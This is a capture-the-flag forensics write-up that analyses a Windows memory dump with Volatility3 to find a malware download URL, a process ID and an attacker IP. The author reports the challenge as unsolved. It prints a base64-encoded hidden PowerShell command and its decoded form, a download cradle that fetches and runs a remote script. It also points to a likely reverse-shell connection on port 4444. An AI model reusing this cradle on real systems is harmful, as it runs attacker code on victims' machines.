Honeypot
Santa really encourages people to be on his good list, but sometimes he is a bit naughty himself. He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics expert, can you help him identify any indications of compromise?
- Find the full URL used to download the malware.
- Find the malicious process's ID.
- Find the attacker's IP.
Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}
Download Link: http://46.101.25.140/forensics_honeypot.zip
Flag
Not pwned. :(
Volatility3
Installation
git clone git@github.com:volatilityfoundation/volatility3.git
cd volatility3
pipenv install
pipenv shell
Useful Commands
# list processes, their PIDs and full command lines
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.cmdline.CmdLine
# list network connections with foreign IPs (windows.netscan.NetScan carves the pool and also finds closed/hidden sockets)
python vol.py -f ~/git/htb-santa-ctf/forensics/honeypot/honeypot.raw windows.netstat.NetStat
Notes
- The honeypot.zip file contains a Windows memory dump.
- By using the volatility3 framework one can extract data from the dump.
- By checking vol -f honeypot.raw windows.cmdline.CmdLine the malicious process is quite obvious:
cat win_cmdline
... snip ...
3504 VBoxTray.exe "C:\Windows\System32\VBoxTray.exe"
3112 WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe
3324 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe"
3344 iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3324 CREDAT:14337
2700 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /window hidden /e aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA==
3732 conhost.exe \??\C:\Windows\system32\conhost.exe "288449379-1457209856-1923954052-101100547-172367320720102786213404402731845854479
4028 whoami.exe Required memory at 0x7ffdf010 is not valid (process exited?)
4036 HOSTNAME.EXE Required memory at 0x7ffd7010 is not valid (process exited?)
2924 DumpIt.exe "C:\Users\Santa\Desktop\DumpIt.exe"
2920 conhost.exe \??\C:\Windows\system32\conhost.exe "280284285205075330588133904-110126809119471720131011406317-845024101-1158882802
168 dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- The base64 string passed to powershell.exe with /e (-EncodedCommand) decodes as UTF-16LE to a download cradle, iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1')). The URL currently serves a rickroll, but it is the only URL in the dump's command lines, so this has to be the download URL. The whoami.exe and HOSTNAME.EXE processes (PIDs 4028 and 4036) that exited shortly after are typical first recon commands of an attacker who just got a shell.
- The PID of the PowerShell process that ran the cradle is 2700.
- By examining the currently active connections, using windows.netscan.NetScan, the following foreign IPs stand out:
Volatility 3 Framework 1.0.1
Offset Proto LocalAddr LocalPort ForeignAddr ForeignPort State PID Owner Created
0x2554b460 TCPv4 10.0.2.15 49226 93.184.220.29 80 ESTABLISHED - - -
0x261e9d30 TCPv4 10.0.2.15 49228 172.67.177.22 443 ESTABLISHED - - -
0x3e2e9cc0 TCPv4 10.0.2.15 49221 212.205.126.106 443 ESTABLISHED - - -
0x3ee98d80 TCPv4 10.0.2.15 49229 147.182.172.189 4444 ESTABLISHED - - -
0x3f1b0df8 TCPv4 10.0.2.15 49216 212.205.126.106 443 ESTABLISHED - - -
0x3f225df8 TCPv4 10.0.2.15 49222 212.205.126.106 443 ESTABLISHED - - -
0x3f547008 TCPv4 10.0.2.15 49220 212.205.126.106 443 ESTABLISHED - - -
0x3f561438 TCPv4 10.0.2.15 49215 204.79.197.203 443 ESTABLISHED - - -
0x3f57c438 TCPv4 10.0.2.15 49218 95.100.210.141 443 ESTABLISHED - - -
0x3f58b4c8 TCPv4 10.0.2.15 49217 212.205.126.106 443 ESTABLISHED - - -
0x3f58c748 TCPv4 10.0.2.15 49223 212.205.126.106 443 ESTABLISHED - - -
0x3f58e9d8 TCPv4 10.0.2.15 49225 172.67.177.22 443 ESTABLISHED - - -
0x3f5c6df8 TCPv4 10.0.2.15 49219 95.100.210.141 443 ESTABLISHED - - -
- By eliminating all the IPs which belong to Microsoft (204.79.197.203) we end up with a small set of 5 IPs. Of those, only 147.182.172.189 is reached on a non-web port; 4444 is the default Metasploit handler port, so this connection looks like the reverse shell and the IP is the strongest candidate for the attacker.
- To generate the flag the following shell script was used, sadly with no success.
- I'm unsure about the ... | md5sum part as this adds a hyphen...
#!/bin/bash
# Candidate flags: HTB{md5(url_pid_ip)}. md5sum prints "<hash>  -" when reading
# stdin, so keep only the first field or the "  -" ends up inside the braces.
url="https://windowsliveupdater.com/update.ps1"
list=(
147.182.172.189 # digital ocean, port 4444
#172.67.177.22 # cloudflare net
#212.205.126.106 # greece
#93.184.220.29 # edgecast
#95.100.210.141 # akamai
)
pids=(
2700 # powershell (encoded download cradle)
1556 # explorer
2460 # SearchFilterHo
2856 # explorer
3324 # iexplorer
3344 # iexplorer
)
for ip in "${list[@]}"; do
for pid in "${pids[@]}"; do
echo "Generating flag for $ip and $pid:"
echo "  hashing: ${url}_${pid}_${ip}"
echo "HTB{$(echo -n "${url}_${pid}_${ip}" | md5sum | cut -d' ' -f1)}"
done
done
- I don't know, maybe the challenge is borked somehow?